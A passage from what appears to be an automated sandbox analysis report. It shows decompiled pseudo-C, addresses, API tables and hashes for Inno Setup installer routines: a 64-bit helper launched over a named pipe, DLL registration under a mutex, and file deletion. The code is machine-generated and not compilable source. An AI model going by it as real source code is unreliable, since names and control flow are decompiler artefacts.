			}






































                                                                    0x00625755
                                                                    0x00625757
                                                                    0x00625762
                                                                    0x00625768
                                                                    0x0062576e
                                                                    0x00625771
                                                                    0x00625778
                                                                    0x0062577d
                                                                    0x0062577e
                                                                    0x00625783
                                                                    0x00625786
                                                                    0x0062578e
                                                                    0x00625793
                                                                    0x0062579b
                                                                    0x006257a2
                                                                    0x006257a2
                                                                    0x006257ae
                                                                    0x006257b5
                                                                    0x006257b5
                                                                    0x006257ba
                                                                    0x006257ba
                                                                    0x006257c1
                                                                    0x006257cc
                                                                    0x006257cf
                                                                    0x006257cf
                                                                    0x006257dd
                                                                    0x006257e3
                                                                    0x006257ec
                                                                    0x006257f2
                                                                    0x006257fc
                                                                    0x00625802
                                                                    0x00625809
                                                                    0x0062580c
                                                                    0x00625812
                                                                    0x00625815
                                                                    0x00625829
                                                                    0x00625853
                                                                    0x0062585a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00625866
                                                                    0x00625871
                                                                    0x00625871
                                                                    0x00625866
                                                                    0x0062587d
                                                                    0x0062587e
                                                                    0x00625883
                                                                    0x00625886
                                                                    0x006258a9
                                                                    0x006258b0
                                                                    0x006258b7
                                                                    0x006258b7
                                                                    0x006258be
                                                                    0x006258bf
                                                                    0x006258c4
                                                                    0x006258c7
                                                                    0x006258ca
                                                                    0x006258e4
                                                                    0x006258eb
                                                                    0x006258eb
                                                                    0x006258fa
                                                                    0x006258ff
                                                                    0x00625914
                                                                    0x0062591f
                                                                    0x00625939
                                                                    0x00625943
                                                                    0x0062594d
                                                                    0x00625953
                                                                    0x0062596a
                                                                    0x00625975
                                                                    0x0062597b
                                                                    0x0062598d
                                                                    0x00625994
                                                                    0x00625994
                                                                    0x00625999
                                                                    0x0062599d
                                                                    0x006259a4
                                                                    0x006259aa
                                                                    0x006259b0
                                                                    0x006259b5
                                                                    0x006259bc
                                                                    0x006259c4
                                                                    0x006259ca
                                                                    0x006259de
                                                                    0x006259e5
                                                                    0x006259e8
                                                                    0x006259eb
                                                                    0x006259f9

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 006257BC
                                                                    • QueryPerformanceCounter.KERNEL32(00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257C5
                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 006257CF
                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257D8
                                                                    • CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062584E
                                                                    • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062585C
                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 006258A4
                                                                    • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,006259FA,?,00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B), ref: 006258DD
                                                                      • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                                    • CreateProcessW.KERNEL32 ref: 00625986
                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 006259BC
                                                                    • CloseHandle.KERNEL32(000000FF,00625A01,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 006259F4
                                                                      • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                    • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                    • API String ID: 770386003-3271284199
                                                                    • Opcode ID: 4b38d71f613c2805a895e8b5dd9c39005fd96be071beebf230027e2823365f0d
                                                                    • Instruction ID: 34d3d620ae4a6a58b4d890a55742d975a8112a0372845dc610fa96f79e58b5cb
                                                                    • Opcode Fuzzy Hash: 4b38d71f613c2805a895e8b5dd9c39005fd96be071beebf230027e2823365f0d
                                                                    • Instruction Fuzzy Hash: 21717F70E407589EDB20EFB9DC46B9EBBB6EF09304F1041A9F509EB282D77499408F65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B9138, Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 260COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E006B9138(char __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v21;
				signed int _v22;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v60;
				void* _t62;
				signed int _t110;
				intOrPtr _t129;
				signed int _t130;
				char _t134;
				char _t139;
				char _t142;
				char* _t149;
				intOrPtr* _t158;
				void* _t159;
				intOrPtr _t181;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t192;
				intOrPtr _t196;
				intOrPtr _t199;
				intOrPtr* _t204;
				intOrPtr _t206;
				intOrPtr _t207;
				void* _t216;

				_t216 = __fp0;
				_t202 = __edi;
				_t157 = __ebx;
				_t206 = _t207;
				_t159 = 7;
				do {
					_push(0);
					_push(0);
					_t159 = _t159 - 1;
				} while (_t159 != 0);
				_push(__ebx);
				_push(__edi);
				_t204 =  *0x6cdec4; // 0x6d579c
				_push(_t206);
				_push(0x6b94fd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t207;
				E005C6FB0(1, __ebx,  &_v36, __edi, _t204);
				_t62 = E00422368(_v36, _t159, L"/REG");
				_t209 = _t62;
				if(_t62 != 0) {
					E005C6FB0(1, __ebx,  &_v40, __edi, _t204);
					__eflags = E00422368(_v40, _t159, L"/REGU");
					if(__eflags != 0) {
						__eflags = 0;
						_pop(_t181);
						 *[fs:eax] = _t181;
						_push(E006B9504);
						E0040A228( &_v60, 7);
						return E0040A228( &_v20, 4);
					} else {
						_v21 = 0;
						goto L6;
					}
				} else {
					_v21 = 1;
					L6:
					E005B8250( *_t204, L"Setup", _t209);
					ShowWindow( *( *_t204 + 0x188), 5);
					E006AF824();
					_v28 = E00413E90(0, 0, L"Inno-Setup-RegSvr-Mutex");
					ShowWindow( *( *_t204 + 0x188), 0);
					if(_v28 != 0) {
						do {
							E005B8704( *_t204);
						} while (MsgWaitForMultipleObjects(1,  &_v28, 0, 0xffffffff, 0x4ff) == 1);
					}
					ShowWindow( *( *_t204 + 0x188), 5);
					_push(_t206);
					_push(0x6b94ce);
					_push( *[fs:eax]);
					 *[fs:eax] = _t207;
					E005C6FB0(0, _t157,  &_v44, _t202, _t204);
					E005C4F90(_v44, _t157,  &_v8, L".msg", _t202, _t204);
					E005C6FB0(0, _t157,  &_v48, _t202, _t204);
					E005C4F90(_v48, _t157,  &_v12, L".lst", _t202, _t204);
					if(E005C685C(_v12) == 0) {
						E00423A20(_v12);
						E00423A20(_v8);
						_push(_t206);
						_push( *[fs:eax]);
						 *[fs:eax] = _t207;
						E006B9098(_t157,  &_v12, _t202, _t204, __eflags);
						_pop(_t189);
						 *[fs:eax] = _t189;
						_t190 = 0x6b949e;
						 *[fs:eax] = _t190;
						_push(E006B94D5);
						__eflags = _v28;
						if(_v28 != 0) {
							ReleaseMutex(_v28);
							return CloseHandle(_v28);
						}
						return 0;
					} else {
						E005CD6BC(_v8, _t157, 1, 0, _t202, _t204);
						_t110 =  *0x6cddd0; // 0x6d603c
						E005C9044(_t110 & 0xffffff00 | ( *(_t110 + 0x4c) & 0x00000001) != 0x00000000);
						_t192 =  *0x6cded8; // 0x6d5c28
						_t26 = _t192 + 0x2f8; // 0x0
						E005B8250( *_t204,  *_t26,  *(_t110 + 0x4c) & 0x00000001);
						_push(_t206);
						_push(0x6b946a);
						_push( *[fs:eax]);
						 *[fs:eax] = _t207;
						E006AC8CC(_t157,  *_t26, _t202, _t204);
						_v32 = E005CBFB8(1, 1, 0, 2);
						_push(_t206);
						_push(0x6b9450);
						_push( *[fs:eax]);
						 *[fs:eax] = _t207;
						while(E005CC258(_v32) == 0) {
							E005CC268(_v32, _t157,  &_v16, _t202, _t204, __eflags);
							_t157 = _v16;
							__eflags = _t157;
							if(_t157 != 0) {
								_t158 = _t157 - 4;
								__eflags = _t158;
								_t157 =  *_t158;
							}
							__eflags = _t157 - 4;
							if(__eflags > 0) {
								__eflags =  *_v16 - 0x5b;
								if(__eflags == 0) {
									__eflags =  *((short*)(_v16 + 6)) - 0x5d;
									if(__eflags == 0) {
										E0040B698(_v16, 0x7fffffff, 5,  &_v20);
										_t129 = _v16;
										__eflags =  *((short*)(_t129 + 4)) - 0x71;
										if( *((short*)(_t129 + 4)) == 0x71) {
											L19:
											_t130 = 1;
										} else {
											__eflags = _v21;
											if(_v21 == 0) {
												L18:
												_t130 = 0;
											} else {
												_t149 =  *0x6cdcc4; // 0x6d67df
												__eflags =  *_t149;
												if( *_t149 == 0) {
													goto L19;
												} else {
													goto L18;
												}
											}
										}
										_v22 = _t130;
										_push(_t206);
										_push(0x6b93c5);
										_push( *[fs:eax]);
										 *[fs:eax] = _t207;
										_t134 = ( *(_v16 + 2) & 0x0000ffff) - 0x53;
										__eflags = _t134;
										if(_t134 == 0) {
											_push(_v22 & 0x000000ff);
											E00624E78(0, _t157, _v20, 1, _t202, _t204, _t216);
										} else {
											_t139 = _t134 - 1;
											__eflags = _t139;
											if(_t139 == 0) {
												__eflags = 0;
												E006255F0(0, _t157, _v20, _t204, 0, _t216);
											} else {
												_t142 = _t139 - 0x1f;
												__eflags = _t142;
												if(_t142 == 0) {
													_push(_v22 & 0x000000ff);
													E00624E78(0, _t157, _v20, 0, _t202, _t204, _t216);
												} else {
													__eflags = _t142 - 1;
													if(__eflags == 0) {
														E0062460C(_v20, _t157, _t204);
													}
												}
											}
										}
										_pop(_t199);
										 *[fs:eax] = _t199;
									}
								}
							}
						}
						_pop(_t196);
						 *[fs:eax] = _t196;
						_push(E006B9457);
						return E00408444(_v32);
					}
				}
			}




































                                                                    0x006b9138
                                                                    0x006b9138
                                                                    0x006b9138
                                                                    0x006b9139
                                                                    0x006b913b
                                                                    0x006b9140
                                                                    0x006b9140
                                                                    0x006b9142
                                                                    0x006b9144
                                                                    0x006b9144
                                                                    0x006b9147
                                                                    0x006b9149
                                                                    0x006b914a
                                                                    0x006b9152
                                                                    0x006b9153
                                                                    0x006b9158
                                                                    0x006b915b
                                                                    0x006b9166
                                                                    0x006b9173
                                                                    0x006b9178
                                                                    0x006b917a
                                                                    0x006b918a
                                                                    0x006b919c
                                                                    0x006b919e
                                                                    0x006b94d5
                                                                    0x006b94d7
                                                                    0x006b94da
                                                                    0x006b94dd
                                                                    0x006b94ea
                                                                    0x006b94fc
                                                                    0x006b91a4
                                                                    0x006b91a4
                                                                    0x00000000
                                                                    0x006b91a4
                                                                    0x006b917c
                                                                    0x006b917c
                                                                    0x006b91a8
                                                                    0x006b91af
                                                                    0x006b91bf
                                                                    0x006b91c4
                                                                    0x006b91d7
                                                                    0x006b91e5
                                                                    0x006b91ee
                                                                    0x006b91f0
                                                                    0x006b91f2
                                                                    0x006b920b
                                                                    0x006b91f0
                                                                    0x006b921b
                                                                    0x006b9222
                                                                    0x006b9223
                                                                    0x006b9228
                                                                    0x006b922b
                                                                    0x006b9233
                                                                    0x006b9243
                                                                    0x006b924d
                                                                    0x006b925d
                                                                    0x006b926c
                                                                    0x006b9474
                                                                    0x006b947c
                                                                    0x006b9483
                                                                    0x006b9489
                                                                    0x006b948c
                                                                    0x006b948f
                                                                    0x006b9496
                                                                    0x006b9499
                                                                    0x006b94aa
                                                                    0x006b94ad
                                                                    0x006b94b0
                                                                    0x006b94b5
                                                                    0x006b94b9
                                                                    0x006b94bf
                                                                    0x00000000
                                                                    0x006b94c8
                                                                    0x006b94cd
                                                                    0x006b9272
                                                                    0x006b9279
                                                                    0x006b927e
                                                                    0x006b928a
                                                                    0x006b928f
                                                                    0x006b9295
                                                                    0x006b929d
                                                                    0x006b92a4
                                                                    0x006b92a5
                                                                    0x006b92aa
                                                                    0x006b92ad
                                                                    0x006b92b0
                                                                    0x006b92ca
                                                                    0x006b92cf
                                                                    0x006b92d0
                                                                    0x006b92d5
                                                                    0x006b92d8
                                                                    0x006b942a
                                                                    0x006b92e6
                                                                    0x006b92eb
                                                                    0x006b92ee
                                                                    0x006b92f0
                                                                    0x006b92f2
                                                                    0x006b92f2
                                                                    0x006b92f5
                                                                    0x006b92f5
                                                                    0x006b92f7
                                                                    0x006b92fa
                                                                    0x006b9303
                                                                    0x006b9307
                                                                    0x006b9310
                                                                    0x006b9315
                                                                    0x006b932c
                                                                    0x006b9331
                                                                    0x006b9334
                                                                    0x006b9339
                                                                    0x006b934f
                                                                    0x006b934f
                                                                    0x006b933b
                                                                    0x006b933b
                                                                    0x006b933f
                                                                    0x006b934b
                                                                    0x006b934b
                                                                    0x006b9341
                                                                    0x006b9341
                                                                    0x006b9346
                                                                    0x006b9349
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x006b9349
                                                                    0x006b933f
                                                                    0x006b9351
                                                                    0x006b9356
                                                                    0x006b9357
                                                                    0x006b935c
                                                                    0x006b935f
                                                                    0x006b9369
                                                                    0x006b9369
                                                                    0x006b936d
                                                                    0x006b9398
                                                                    0x006b93a0
                                                                    0x006b936f
                                                                    0x006b936f
                                                                    0x006b936f
                                                                    0x006b9372
                                                                    0x006b93b4
                                                                    0x006b93b6
                                                                    0x006b9374
                                                                    0x006b9374
                                                                    0x006b9374
                                                                    0x006b9378
                                                                    0x006b9385
                                                                    0x006b938d
                                                                    0x006b937a
                                                                    0x006b937a
                                                                    0x006b937d
                                                                    0x006b93aa
                                                                    0x006b93aa
                                                                    0x006b937d
                                                                    0x006b9378
                                                                    0x006b9372
                                                                    0x006b93bd
                                                                    0x006b93c0
                                                                    0x006b93c0
                                                                    0x006b9315
                                                                    0x006b9307
                                                                    0x006b92fa
                                                                    0x006b943c
                                                                    0x006b943f
                                                                    0x006b9442
                                                                    0x006b944f
                                                                    0x006b944f
                                                                    0x006b926c

                                                                    APIs
                                                                    • ShowWindow.USER32(?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000,?,006B99DE,00000000,006B99E8,?,00000000), ref: 006B91BF
                                                                    • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000), ref: 006B91E5
                                                                    • MsgWaitForMultipleObjects.USER32 ref: 006B9206
                                                                    • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000), ref: 006B921B
                                                                      • Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ShowWindow$FileModuleMultipleNameObjectsWait
                                                                    • String ID: (\m$.lst$.msg$/REG$/REGU$<`m$Inno-Setup-RegSvr-Mutex$Setup
                                                                    • API String ID: 66301061-906243933
                                                                    • Opcode ID: 078cf02edb1222c4bc64e21194ae756c0ceff5465f997aaa320c40601d4a08a6
                                                                    • Instruction ID: 4d26cb6eac5053f9cdac576eea358071a92945d2d4b93ba07426bed60c59251a
                                                                    • Opcode Fuzzy Hash: 078cf02edb1222c4bc64e21194ae756c0ceff5465f997aaa320c40601d4a08a6
                                                                    • Instruction Fuzzy Hash: 9B91D5B0A042059FDB10EBA4D856FEEBBF6FB49304F514469F600A7381DA79AD81CB74
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00629850, Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 214COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E00629850(char __eax, void* __ebx, signed char __edx, void* __edi, void* __esi, void* __fp0, char _a4, char _a8, intOrPtr _a12) {
				char _v5;
				char _v6;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v60;
				void* __ecx;
				char _t65;
				void* _t69;
				void* _t112;
				signed char _t135;
				intOrPtr _t137;
				intOrPtr _t164;
				intOrPtr _t178;
				void* _t188;
				signed int _t189;
				char _t191;
				intOrPtr _t193;
				intOrPtr _t194;

				_t210 = __fp0;
				_t187 = __edi;
				_t193 = _t194;
				_t137 = 6;
				do {
					_push(0);
					_push(0);
					_t137 = _t137 - 1;
				} while (_t137 != 0);
				_push(_t137);
				_t1 =  &_v8;
				_t138 =  *_t1;
				 *_t1 = _t137;
				_push(__edi);
				_v5 =  *_t1;
				_t135 = __edx;
				_t191 = __eax;
				_push(_t193);
				_push(0x629b12);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				_v6 = 1;
				E005C53D0(__eax,  &_v12);
				if(E00422368(_v12,  *_t1, L".hlp") != 0) {
					E005C53D0(_t191,  &_v24);
					_t65 = E00422368(_v24, _t138, L".chm");
					__eflags = _t65;
					if(_t65 == 0) {
						E005C4F90(_t191, _t135,  &_v28, L".chw", __edi, _t191);
						__eflags = 0;
						E00629850(_v28, _t135, _t135, __edi, _t191, __fp0, 0, 0, _a12);
						_pop(_t138);
					}
				} else {
					E005C4F90(_t191, _t135,  &_v16, L".gid", __edi, _t191);
					E00629850(_v16, _t135, _t135, __edi, _t191, __fp0, 0, 0, _a12);
					E005C4F90(_t191, _t135,  &_v20, L".fts", __edi, _t191);
					E00629850(_v20, _t135, _t135, _t187, _t191, __fp0, 0, 0, _a12);
					_pop(_t138);
				}
				E005C53D0(_t191,  &_v32);
				_t69 = E00422368(_v32, _t138, L".lnk");
				_t197 = _t69;
				if(_t69 == 0) {
					E00624924(_t191, _t135);
				}
				if(E0060C5F4(_t135, _t191, _t197) == 0) {
					L25:
					_pop(_t164);
					 *[fs:eax] = _t164;
					_push(E00629B19);
					E0040A228( &_v60, 5);
					return E0040A228( &_v32, 6);
				} else {
					_v40 = _t191;
					_v36 = 0x11;
					_t141 = 0;
					E006163B4(L"Deleting file: %s", _t135, 0,  &_v40, _t187, _t191);
					_t199 = _a4;
					if(_a4 != 0) {
						_t189 = E0060C330(_t135, _t191, _t199);
						if(_t189 != 0xffffffff) {
							_t201 = _t189 & 0x00000001;
							if((_t189 & 0x00000001) != 0) {
								_t141 = 0xfffffffe & _t189;
								_t112 = E0060C6DC(_t135, 0xfffffffe & _t189, _t191, _t201);
								_t202 = _t112;
								if(_t112 == 0) {
									E00616130(L"Failed to strip read-only attribute.", _t135, _t189, _t191);
								} else {
									E00616130(L"Stripped read-only attribute.", _t135, _t189, _t191);
								}
							}
						}
					}
					if(E0060C158(_t135, _t191, _t202) != 0) {
						__eflags = _v5;
						if(_v5 != 0) {
							SHChangeNotify(4, 5, E0040B278(_t191), 0);
							E005C5378(_t191, _t141,  &_v60);
							E00610640( *((intOrPtr*)(_a12 - 0x3c)), _t141, _v60, _t210);
						}
						goto L25;
					} else {
						_t188 = GetLastError();
						if(_a8 == 0 ||  *((char*)(_a12 - 0x29)) == 0) {
							L22:
							_v40 = _t188;
							_v36 = 0;
							E006163B4(L"Failed to delete the file; it may be in use (%d).", _t135, 0,  &_v40, _t188, _t191);
							_v6 = 0;
							goto L25;
						} else {
							if(_t188 == 5) {
								L20:
								if((E0060C330(_t135, _t191, _t207) & 0x00000001) != 0) {
									goto L22;
								}
								_v40 = _t188;
								_v36 = 0;
								E006163B4(L"The file appears to be in use (%d). Will delete on restart.", _t135, 0,  &_v40, _t188, _t191);
								_push(_t193);
								 *[fs:eax] = _t194;
								E0060D8B0(_t135, _t135, _t191, _t188, _t191);
								 *((char*)( *((intOrPtr*)(_a12 - 0x30)) + 0x1c)) = 1;
								E005C52C8(_t191,  &_v48, _t193,  *[fs:eax]);
								E005C5378(_v48, 0,  &_v44);
								E00610640( *((intOrPtr*)(_a12 + (_t135 & 0x000000ff) * 4 - 0x38)), _a12, _v44, _t210);
								_t178 = 0x629a6d;
								 *[fs:eax] = _t178;
								goto L25;
							}
							_t207 = _t188 - 0x20;
							if(_t188 != 0x20) {
								goto L22;
							}
							goto L20;
						}
					}
				}
			}






























                                                                    0x00629850
                                                                    0x00629850
                                                                    0x00629851
                                                                    0x00629854
                                                                    0x00629859
                                                                    0x00629859
                                                                    0x0062985b
                                                                    0x0062985d
                                                                    0x0062985d
                                                                    0x00629860
                                                                    0x00629861
                                                                    0x00629861
                                                                    0x00629861
                                                                    0x00629866
                                                                    0x00629867
                                                                    0x0062986a
                                                                    0x0062986c
                                                                    0x00629870
                                                                    0x00629871
                                                                    0x00629876
                                                                    0x00629879
                                                                    0x0062987c
                                                                    0x00629885
                                                                    0x00629899
                                                                    0x006298ea
                                                                    0x006298f7
                                                                    0x006298fc
                                                                    0x006298fe
                                                                    0x00629912
                                                                    0x0062991a
                                                                    0x0062991e
                                                                    0x00629923
                                                                    0x00629923
                                                                    0x0062989b
                                                                    0x006298ad
                                                                    0x006298b9
                                                                    0x006298d1
                                                                    0x006298dd
                                                                    0x006298e2
                                                                    0x006298e2
                                                                    0x00629929
                                                                    0x00629936
                                                                    0x0062993b
                                                                    0x0062993d
                                                                    0x00629941
                                                                    0x00629941
                                                                    0x00629951
                                                                    0x00629aea
                                                                    0x00629aec
                                                                    0x00629aef
                                                                    0x00629af2
                                                                    0x00629aff
                                                                    0x00629b11
                                                                    0x00629957
                                                                    0x00629957
                                                                    0x0062995a
                                                                    0x00629961
                                                                    0x00629968
                                                                    0x0062996d
                                                                    0x00629971
                                                                    0x0062997c
                                                                    0x00629981
                                                                    0x00629983
                                                                    0x00629989
                                                                    0x00629990
                                                                    0x00629996
                                                                    0x0062999b
                                                                    0x0062999d
                                                                    0x006299b0
                                                                    0x0062999f
                                                                    0x006299a4
                                                                    0x006299a4
                                                                    0x0062999d
                                                                    0x00629989
                                                                    0x00629981
                                                                    0x006299c0
                                                                    0x00629ab9
                                                                    0x00629abd
                                                                    0x00629acd
                                                                    0x00629ad7
                                                                    0x00629ae5
                                                                    0x00629ae5
                                                                    0x00000000
                                                                    0x006299c6
                                                                    0x006299cb
                                                                    0x006299d1
                                                                    0x00629a9d
                                                                    0x00629a9d
                                                                    0x00629aa0
                                                                    0x00629aae
                                                                    0x00629ab3
                                                                    0x00000000
                                                                    0x006299e4
                                                                    0x006299e7
                                                                    0x006299f2
                                                                    0x006299fd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00629a03
                                                                    0x00629a06
                                                                    0x00629a14
                                                                    0x00629a1b
                                                                    0x00629a24
                                                                    0x00629a2d
                                                                    0x00629a38
                                                                    0x00629a41
                                                                    0x00629a4c
                                                                    0x00629a5e
                                                                    0x00629a65
                                                                    0x00629a68
                                                                    0x00000000
                                                                    0x00629a68
                                                                    0x006299e9
                                                                    0x006299ec
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x006299ec
                                                                    0x006299d1
                                                                    0x006299c0

                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,00629B12,?,?,?,?,00000005,00000000,00000000,?,?,0062AF86,00000000,00000000,?,00000000), ref: 006299C6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                    • API String ID: 1452528299-3112430753
                                                                    • Opcode ID: e86b536b56413c09e9305a1eb6eef416c5ea9b69f8604097457debdc0e62690a
                                                                    • Instruction ID: 80e8b6ab9e5d3a552657306fa088f7fa642ecff14c11c84625059ee943e1d250
                                                                    • Opcode Fuzzy Hash: e86b536b56413c09e9305a1eb6eef416c5ea9b69f8604097457debdc0e62690a
                                                                    • Instruction Fuzzy Hash: D371E330B00B245FDB04EF68E851BEE77A6AF89710F14842DF801A7381DAB89D45CB79
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060E4D8, Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 253registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E0060E4D8(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _v12;
				char _v13;
				void* _v20;
				char _v21;
				char _v28;
				int _v32;
				int _v36;
				char _v40;
				char _v44;
				char* _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char* _v72;
				char _v76;
				char _v80;
				void* _t77;
				char _t98;
				char _t103;
				char* _t110;
				char _t133;
				char _t139;
				char _t144;
				void* _t168;
				short* _t169;
				char _t170;
				char _t172;
				intOrPtr _t189;
				intOrPtr _t194;
				intOrPtr _t196;
				void* _t207;
				void* _t208;
				intOrPtr _t209;

				_t207 = _t208;
				_t209 = _t208 + 0xffffffb4;
				_push(__esi);
				_push(__edi);
				_v40 = 0;
				_v44 = 0;
				_v60 = 0;
				_v76 = 0;
				_v80 = 0;
				_v56 = 0;
				_v8 = 0;
				_v12 = __edx;
				_push(_t207);
				_push(0x60e7be);
				_push( *[fs:edx]);
